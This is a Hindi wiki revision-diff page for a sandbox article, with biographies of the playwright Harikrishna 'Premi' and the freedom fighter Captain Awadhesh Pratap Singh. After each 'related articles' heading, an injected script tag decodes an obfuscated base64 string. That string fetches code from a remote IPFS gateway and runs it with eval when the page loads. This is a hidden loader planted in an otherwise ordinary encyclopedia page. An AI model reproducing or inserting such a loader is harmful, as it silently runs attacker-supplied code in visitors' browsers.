"प्रयोग:दीपिका2": अवतरणों में अंतर
(' {{सूचना बक्सा साहित्यकार |चित्र=Blankimage.png |चित्र का नाम=...' के साथ नया पृष्ठ बनाया) |
No edit summary |
||
पंक्ति 1: | पंक्ति 1: | ||
{{सूचना बक्सा साहित्यकार | {{सूचना बक्सा साहित्यकार | ||
|चित्र=Blankimage.png | |चित्र=Blankimage.png | ||
पंक्ति 7: | पंक्ति 6: | ||
|जन्म= [[1908]] ई. | |जन्म= [[1908]] ई. | ||
|जन्म भूमि=गुना, [[ग्वालियर]], [[मध्य प्रदेश]] | |जन्म भूमि=गुना, [[ग्वालियर]], [[मध्य प्रदेश]] | ||
|मृत्यु= | |मृत्यु=[[1974]] ई. | ||
|मृत्यु स्थान= | |मृत्यु स्थान= | ||
|अभिभावक= | |अभिभावक= | ||
पंक्ति 33: | पंक्ति 32: | ||
|अद्यतन= | |अद्यतन= | ||
}} | }} | ||
'''हरिकृष्ण 'प्रेमी'''' (जन्म-[[1908]] ई., गुना, [[ग्वालियर]], [[मध्य प्रदेश]]) का [[हिंदी]] नाटककारों में विशिष्ट स्थान है। मध्यकालीन इतिहास से [[कथा]] प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके नाटक रंगमच की दृष्टि से सफल हैं। | '''हरिकृष्ण 'प्रेमी'''' (जन्म-[[1908]] ई., गुना, [[ग्वालियर]], [[मध्य प्रदेश]]; मृत्यु-[[1974]] ई.) का [[हिंदी]] नाटककारों में विशिष्ट स्थान है। मध्यकालीन इतिहास से [[कथा]] प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके नाटक रंगमच की दृष्टि से सफल हैं। | ||
==परिचय== | ==परिचय== | ||
पंक्ति 50: | पंक्ति 49: | ||
'प्रेमी' जी का [[हिंदी]] नाटककारों में अपना विशिष्ट स्थान है। मध्यकालीन इतिहास से कथा प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके [[नाटक]] रंगमच की दृष्टि से सफल हैं। उनके सामाजिक नाटकों में वर्तमान जीवन की विषमंताओं के प्रति तीव्र आक्रोश और विद्रोह का स्वर सुनने को मिलता है। किसी समस्या का चित्रण करते हुए वे उसका हल अवश्य देते हैं और इस सम्बंध में [[गाँधी जी]] के जीवन-दर्शन का उन पर विशेष प्रभाव है। | 'प्रेमी' जी का [[हिंदी]] नाटककारों में अपना विशिष्ट स्थान है। मध्यकालीन इतिहास से कथा प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके [[नाटक]] रंगमच की दृष्टि से सफल हैं। उनके सामाजिक नाटकों में वर्तमान जीवन की विषमंताओं के प्रति तीव्र आक्रोश और विद्रोह का स्वर सुनने को मिलता है। किसी समस्या का चित्रण करते हुए वे उसका हल अवश्य देते हैं और इस सम्बंध में [[गाँधी जी]] के जीवन-दर्शन का उन पर विशेष प्रभाव है। | ||
==मृत्यु== | |||
हरिकृष्ण 'प्रेमी' जी की मृत्यु [[1974]] ई. में हुई थी। | |||
{{प्रचार}} | {{प्रचार}} | ||
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}} | {{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}} | ||
पंक्ति 61: | पंक्ति 62: | ||
[[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:साहित्य कोश]][[Category:जीवनी साहित्य]] | [[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:साहित्य कोश]][[Category:जीवनी साहित्य]] | ||
[[Category:आधुनिक साहित्यकार]] | [[Category:आधुनिक साहित्यकार]] | ||
__INDEX__ | |||
__NOTOC__ | |||
'''कैप्टन अवधेश प्रताप सिंह''' (अंग्रेज़ी:''Captain Awadhesh Pratap Singh'', जन्म-1888, सतना, मध्य प्रदेश; मृत्यु- [[6 जून]], [[1967]]) विंध्य प्रदेश और महाकौशल के प्रमुख राजनैतिक और सामाजिक कार्यकर्त्ता थे। वे [[1946]]-[[1950]] में देश की संविधान सभा के भी सदस्य रहे। | |||
==परिचय== | |||
कैप्टन अवधेश प्रताप सिंह का जन्म [[1888]] ई. को [[मध्य प्रदेश]] के सतना ज़िले में हुआ था। ये विंध्य प्रदेश और महाकौशल के प्रमुख राजनैतिक और सामाजिक कार्यकर्त्ता थे। अवधेश प्रताप सिंह [[इलाहाबाद]] से कानून की शिक्षा प्राप्त करने के बाद वे रीवा रियासत की सेना में भर्ती हो गए। वहां वे कैप्टन और कुछ समय तक मेजर भी रहे। लेकिन शीघ्र ही रियासत की नौकरी त्यागकर उन्होंने राजेन्द्रनाथ लहरी जैसे क्रान्तिकारियों से संपर्क किया और कुछ रियासतों के नरेशों से मिलकर अंग्रेज़ों के विरुद्ध सशस्त्र विद्रोह जी योजना बनाई। परंतु समय से पहले भेद खुल जाने पर इसमें सफलता नहीं मिली। | |||
अवधेश प्रताप सिंह को 'द्वंद्वात्मक भौतिकवाद' और 'इतिहास के अर्थशास्त्रीय अध्ययन' का अच्छा ज्ञान था। अपने जीवन के अंतिम वर्षों में वे कांग्रेस में उपजी सत्ता की प्रवृत्ति के कटु आलोचक बन गए थे। | |||
;राजनैतिक जीवन | |||
अवधेश प्रताप सिंह इसके बाद [[कांग्रेस]] में सम्मिलित हो गए और [[1921]] से [[1942]] तक के आंदोलनों में लगभग चार वर्ष जेलों में बंद रहे। उन्होंने देशी रियासतों में जनतंत्र की स्थापना और समाज उत्थान के लिए निरंतर काम किया। अपने [[पिता]] के विरोध की अपेक्षा करके उन्होंने [[1920]] में अपने परिवार के दो मंदिर हरिजनों के लिए खुलवा दिए थे। स्वतंत्रता के बाद कुछ समय के लिए विंध्य प्रदेश अलग राज्य बना तो उसके प्रथम [[मुख्यमंत्री]] कैप्टन अवधेश सिंह ही निर्वाचित हुए। वे [[1946]]-[[1950]] में देश की संविधान सभा के भी सदस्य थे। अपने सीमित समय के मुख्यमंत्री-काल में उन्होंने शिक्षा के प्रसार के लिए काम किया। | |||
==मृत्यु== | |||
अवधेश प्रताप सिंह [[6 जून]], [[1967]] को निधन हुआ था। | |||
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }} | |||
==टीका टिप्पणी और संदर्भ== | |||
<references/> | |||
==बाहरी कड़ियाँ== | |||
==संबंधित लेख== | |||
{{सामाजिक कार्यकर्ता}} | |||
[[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:सामाजिक कार्यकर्ता]] | |||
__INDEX__ | __INDEX__ | ||
__NOTOC__ | __NOTOC__ |
12:50, 20 अक्टूबर 2016 का अवतरण
दीपिका2
| |
पूरा नाम | हरिकृष्ण 'प्रेमी' |
जन्म | 1908 ई. |
जन्म भूमि | गुना, ग्वालियर, मध्य प्रदेश |
मृत्यु | 1974 ई. |
कर्म-क्षेत्र | साहित्य, काव्य |
मुख्य रचनाएँ | 'स्वर्ण विहान' (1930)', 'रक्षा-बंधन' (1938)', 'प्रतिशोध' (1937)','बादलों के पार' (1942) |
प्रसिद्धि | साहित्यकार |
नागरिकता | भारतीय |
अन्य जानकारी | 'प्रेमी' जी की सर्वप्रथम प्रकाशित रचना 'स्वर्ण विहान' (1930 ई.) गति-नाट्य है। उसमें प्रेम और राष्ट्रीयता की भावनाओं की बड़ी रसात्मक अभिव्यक्ति है। |
इन्हें भी देखें | कवि सूची, साहित्यकार सूची |
हरिकृष्ण 'प्रेमी' (जन्म-1908 ई., गुना, ग्वालियर, मध्य प्रदेश; मृत्यु-1974 ई.) का हिंदी नाटककारों में विशिष्ट स्थान है। मध्यकालीन इतिहास से कथा प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके नाटक रंगमच की दृष्टि से सफल हैं।
परिचय
हरिकृष्ण 'प्रेमी' का जन्म 1908 ई. को गुना, ग्वालियर, मध्य प्रदेश में हुआ था। इनका परिवार राष्ट्रभक्त था तथा इनमें बचपन से ही राष्ट्रीयता के संस्कार थे। दो वर्ष की अवस्था में माता की मृत्यु हो गयी थी। प्रेम की अतृप्त तृष्णा ने उन्हें स्वयं 'प्रेमी' बना दिया। बंधु-बांधवों के प्रति स्नेहालु, मित्रों के प्रति अनुरक्त, स्वदेशानुराग, मनुष्य मात्र के प्रति सौहाएद-यही उनके अंतर मन का विकास है।
- साहित्यिक जीवन प्रारम्भ
पं. माखनलाल चतुर्वेदी के साथ 'त्यागभूमि' में पत्रकार के रूप में साहित्यिक जीवन का प्रारम्भ किया। फिर कविताएँ लिखने लगे और उसके बाद नाटक रचना की ओर प्रवृत्ति हुई। लाहौर में पत्रकार और प्रकाशक रहे। सन 1933-1934 ई. में साहित्यिक कार्य किया। स्वाधीनता आन्दोलन में भी भाग लेते रहे। लाहौर से 'भारती' पत्रिका का प्रकाशन किया। सन 1946 में लाहौर में और उसके बाद बम्बई (वर्तमान मुम्बई) में फिल्म-क्षेत्र में कार्य किया। हरिकृष्ण ने उसके बाद आकाशवाणी जालंधर में हिंदी दिग्दर्शक रहे। बाद में बम्बई में फिल्म-क्षेत्र में कार्य करते रहे।
रचनाएँ
'प्रेमी' जी की सर्वप्रथम प्रकाशित रचना 'स्वर्ण विहान' (1930 ई.) गति-नाट्य है। उसमें प्रेम और राष्ट्रीयता की भावनाओं की बड़ी रसात्मक अभिव्यक्ति है। पहले ऐतिहासिक नाटक 'रक्षा-बंधन' (1938 ई.) में गुजरात के बहादुर शाह के आक्रमण के अवसर पर चित्तौड़ की रक्षा के लिए रानी कर्मवती द्वारा मुग़ल सम्राट हुमायूँ को राखी भेजने का प्रसंग है। इस रचना का मूल उद्देश्य हिंदू मुस्लिम सामंजस्य की भावना जागाना है। 'शिवा साधना' (1937 ई.) में शिवाजी की औरंगजेब की साम्प्रदायिक एवं तानाशाही नीति के विरोधी तथा धर्म निरपेक्षता और राष्ट्रीय भावना के संस्थापक के रूप में चित्रित किया गया है। 'प्रतिशोध' (1937 ई.) में छत्रपाल द्वारा बुंदेलखण्ड की शक्तियों को एकत्र करके औरंगजेब से टक्कर लेने का प्रसंग है। 'आहुति' (1940 ई.) में रणथम्भौर के हम्मीर देव द्वारा शरणागत रक्षा के लिए अलाउद्दीन खिलजी से संघर्ष और आत्म बलिदान की कथा है। 'स्वप्नभंग' (1940 ई.) में दारा की पराजय से धर्म निरपेक्षता के आदर्श के खण्डित होने का दुख:द दृश्य है। 'मित्र' (1945 ई.), 'नवीन संज्ञा', 'शतरंज के खिलाड़ी' में युद्ध-क्षेत्र में परस्पर एक दूसरे का विरोध करते हुए भी दो व्यक्तियों के मित्रता निर्वाह का आख्यान है। 'विषपान' (1945 ई.) में मेवाड़ की राजकुमारी का स्वदेश-रक्षा के लिए आत्मघात का प्रसंग है। 'उद्धार', 'भग्न प्राचीर', 'प्रकाशस्तम्भ', 'कीर्तिस्तम्भ', 'विदा' और सौंपों की सृष्टि में भी मध्यकालीन कथा-प्रसंग ही लिये गये हैं। 'शपथ' और 'सवंत प्रवर्तन' आदिमयुगीन इतिहास पर आधारित है। 'संरक्षक' का कथा-प्रसंग अंग्रेज़ी राज्य के प्रारम्भिक काल से उसकी 'येन केन प्रकारेण' साम्राज्य विस्तार की नीति को स्पष्ट करने के लिए लिया गया है। 'पाताल विजय' (1936 ई.) 'प्रेमी' जी का एकमात्र पौराणिक नाटक है।
- नाटक रचनाएँ
'प्रेमी' जी ने सामाजिक नाटक भी लिखे हैं। 'बंधन' (1940 ई.) में मजदूरों और पूँजीपति के संघर्ष का चित्रण है। समस्या का हल गाँधी जी की हृदय-परिवर्तन की नीति पर आधारित है। 'छाया' (1941 ई.) में एक साहित्यकार के आर्थिक संघर्ष का चित्रण है। 'ममता' में दाम्पत्य जीवन की समस्याओं का उद्धाटन है। 'प्रेमी' जी की एकांकी रचना 'बेड़ियाँ' में भी इसी समस्या को लिया गया है। 'प्रेमी' जी के दो एकांकी संग्रह 'मंदिर' (1942 ई.) और 'बादलों के पार' (1942 ई.) भी प्रकाशित हुए है। पहले संग्रह की सभी रचनाएँ 'नयी संज्ञा' देकर नये संग्रह में भी है। 'बादलों के पार', 'घर या होटल', 'वाणी मंदिर', 'नया समाज', 'यह मेरी जन्म भूमि है', और 'पश्चात्ताप' एकांकियों में आज की सामाजिक समस्याओं का चित्रण है। 'यह भी एक खेल है', 'प्रेम अंधा है', 'रूप शिखा', 'मातृभूमि का मान' और 'निष्ठुत न्याय', ऐतिहासिक एकांकी हैं। इनमें प्रेम के आर्दशवादी और विद्रोही स्वरूप को प्रस्तुत किया गया है।
'प्रेमी' जी ने इधर गीति-नाट्य की शैली के कई प्रयोग किये हैं। 'सोहनी महीवाल', 'सस्सी पुन्नू', 'मिर्जा साहिबा', 'हीर राँझा' और 'दुल्लाभट्टी'। ये सभी पंजाब में प्रसिद्ध प्रेम-गाथाओं पर आधारित रेडियों के लिए लिखित संगीत रूपक हैं। प्रेम के एकनिष्ठ और विद्रोही रूपको इनमें भी उपस्थित किया गया है। देवदासी' संगीत-रूपक में भी काल्पनिक कथा को लेकर प्रेम को मनुष्य का स्वाभाविक गुणधर्म दिखाया गया है। 'मीराँबाई' में व्यक्तिगत जीवन की कठोरताओं से प्रेरित होकर गिरिधर गोपाल की माधुरी उपासना में आश्रय लेने वाली मीराँ की जीवन-कथा है।
- कविता-संग्रह
'प्रेमी' जी का कविता-संग्रह 'आँखों में' (1930 ई.) प्रेम के विरह-विदग्ध वेदनामय स्वरूप स्वरूप की अभिव्यक्ति है। 'जादूगरनी' (1932 ई.) में कबीर की 'माया महाठगिनी' के मोहक प्रभाव का वर्णन एवं रहस्यात्मक अनुभूतियों की व्यंजना है। 'अनंत के पथ पर' (1932 ई.) रहस्यानुभूमि को औरघनीभूत रूप में उपस्थित करता है। 'अग्निगान' (1940 ई.) में कवि अनल वीणा लेकर राष्ट्रीय जागरण के गीत या उठा है। 'रूप दर्शन' में गजल और गीति-शैली के सम्मिलित विधान में सौंदर्य के मोहक प्रभाव को वाणी मिली है। 'प्रतिभा' में प्रेमी का प्रणय-निवेदन बड़ा मुखर हो उठा है। 'वंदना के बोल' में गाँधी जी और उनके जीवन दर्शन पर लिखित रचनाएँ हैं। 'रूप रेखा' में गजल के बन्द का सशक्त प्रयोग और 'प्रेमी' के हृदय की आकुल पुकार है 'प्रेमी' जी ने मुक्त छंद में भी कुछ रचनाएँ की हैं। 'करना है संग्राम', 'बेटी की विदा' और 'बहन का विवाह'- ये सभी संस्मरणात्मक हैं और इनमें 'प्रेमी जी' के विद्रोही दृष्टिकोण, नवीन मान्यताओं और नूतन आदर्शों की बड़ी प्रभावपूर्ण अभिव्यक्ति है।
'प्रेमी' जी का हिंदी नाटककारों में अपना विशिष्ट स्थान है। मध्यकालीन इतिहास से कथा प्रसंगो को लेकर उन्होंने हमें राष्ट्रीय जागरण, धर्म निरपेक्षता तथा विश्व-बंधुत्व के महान संदेश दिये हैं। उनके नाटकों में स्वच्छंदवादी शैली का बड़ा संयमित और अनुशासनपूर्ण उपयोग है, इसलिए उनके नाटक रंगमच की दृष्टि से सफल हैं। उनके सामाजिक नाटकों में वर्तमान जीवन की विषमंताओं के प्रति तीव्र आक्रोश और विद्रोह का स्वर सुनने को मिलता है। किसी समस्या का चित्रण करते हुए वे उसका हल अवश्य देते हैं और इस सम्बंध में गाँधी जी के जीवन-दर्शन का उन पर विशेष प्रभाव है।
मृत्यु
हरिकृष्ण 'प्रेमी' जी की मृत्यु 1974 ई. में हुई थी।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
कैप्टन अवधेश प्रताप सिंह (अंग्रेज़ी:Captain Awadhesh Pratap Singh, जन्म-1888, सतना, मध्य प्रदेश; मृत्यु- 6 जून, 1967) विंध्य प्रदेश और महाकौशल के प्रमुख राजनैतिक और सामाजिक कार्यकर्त्ता थे। वे 1946-1950 में देश की संविधान सभा के भी सदस्य रहे।
परिचय
कैप्टन अवधेश प्रताप सिंह का जन्म 1888 ई. को मध्य प्रदेश के सतना ज़िले में हुआ था। ये विंध्य प्रदेश और महाकौशल के प्रमुख राजनैतिक और सामाजिक कार्यकर्त्ता थे। अवधेश प्रताप सिंह इलाहाबाद से कानून की शिक्षा प्राप्त करने के बाद वे रीवा रियासत की सेना में भर्ती हो गए। वहां वे कैप्टन और कुछ समय तक मेजर भी रहे। लेकिन शीघ्र ही रियासत की नौकरी त्यागकर उन्होंने राजेन्द्रनाथ लहरी जैसे क्रान्तिकारियों से संपर्क किया और कुछ रियासतों के नरेशों से मिलकर अंग्रेज़ों के विरुद्ध सशस्त्र विद्रोह जी योजना बनाई। परंतु समय से पहले भेद खुल जाने पर इसमें सफलता नहीं मिली। अवधेश प्रताप सिंह को 'द्वंद्वात्मक भौतिकवाद' और 'इतिहास के अर्थशास्त्रीय अध्ययन' का अच्छा ज्ञान था। अपने जीवन के अंतिम वर्षों में वे कांग्रेस में उपजी सत्ता की प्रवृत्ति के कटु आलोचक बन गए थे।
- राजनैतिक जीवन
अवधेश प्रताप सिंह इसके बाद कांग्रेस में सम्मिलित हो गए और 1921 से 1942 तक के आंदोलनों में लगभग चार वर्ष जेलों में बंद रहे। उन्होंने देशी रियासतों में जनतंत्र की स्थापना और समाज उत्थान के लिए निरंतर काम किया। अपने पिता के विरोध की अपेक्षा करके उन्होंने 1920 में अपने परिवार के दो मंदिर हरिजनों के लिए खुलवा दिए थे। स्वतंत्रता के बाद कुछ समय के लिए विंध्य प्रदेश अलग राज्य बना तो उसके प्रथम मुख्यमंत्री कैप्टन अवधेश सिंह ही निर्वाचित हुए। वे 1946-1950 में देश की संविधान सभा के भी सदस्य थे। अपने सीमित समय के मुख्यमंत्री-काल में उन्होंने शिक्षा के प्रसार के लिए काम किया।
मृत्यु
अवधेश प्रताप सिंह 6 जून, 1967 को निधन हुआ था।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>